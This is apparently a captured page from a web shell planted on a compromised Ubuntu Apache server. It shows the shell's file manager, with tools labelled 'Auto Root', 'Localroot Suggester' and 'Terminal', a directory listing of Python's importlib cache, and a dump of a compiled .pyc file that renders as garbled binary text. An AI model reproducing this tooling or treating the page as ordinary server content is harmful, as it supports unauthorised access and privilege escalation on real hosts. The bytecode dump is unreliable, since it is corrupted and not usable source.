Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 216.73.216.49
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.10 /
importlib /
__pycache__ /
Delete
Unzip
Name
Size
Permission
Date
Action
__init__.cpython-310.pyc
3.72
KB
-rw-r--r--
2025-02-22 06:16
_abc.cpython-310.pyc
1.92
KB
-rw-r--r--
2025-02-22 06:16
_adapters.cpython-310.pyc
3.62
KB
-rw-r--r--
2025-02-22 06:16
_bootstrap.cpython-310.pyc
29.42
KB
-rw-r--r--
2025-02-22 06:16
_bootstrap_external.cpython-310.pyc
43.27
KB
-rw-r--r--
2025-02-22 06:16
_common.cpython-310.pyc
2.9
KB
-rw-r--r--
2025-02-22 06:16
abc.cpython-310.pyc
15.52
KB
-rw-r--r--
2025-02-22 06:16
machinery.cpython-310.pyc
944
B
-rw-r--r--
2025-02-22 06:16
readers.cpython-310.pyc
5.06
KB
-rw-r--r--
2025-02-22 06:16
resources.cpython-310.pyc
5.24
KB
-rw-r--r--
2025-02-22 06:16
util.cpython-310.pyc
9.11
KB
-rw-r--r--
2025-02-22 06:16
Save
Rename
o �*�g� � @ s� d dl Z d dlZd dlZd dlZd dlZd dlZd dlZd dlmZm Z m Z ddlmZm Z ddlmZ eejef Zdd� Zdd � Zd d� Zdd � Zdd� Zdd� Zejde jd�dd��Zejdd� �Ze�ej�ejdd� ��Z dS )� N)�Union�Any�Optional� )�ResourceReader�Traversable)� wrap_specc C s t t| ��S )z3 Get a Traversable resource from a package )�from_package�get_package)�package� r �(/usr/lib/python3.10/importlib/_common.py�files s r c C s. t | �}tj�|�\}}|rt| �d���|S )z�Normalize a path by ensuring it is a string. If the resulting string contains path separators, an exception is raised. z must be only a file name)�str�os�path�split� ValueError)r �str_path�parent� file_namer r r �normalize_path s r c C s* | j }t|jdd�}|du rdS ||j�S )z? Return the package's loader if it's a ResourceReader. �get_resource_readerN)�__spec__�getattr�loader�name�r �spec�readerr r r r &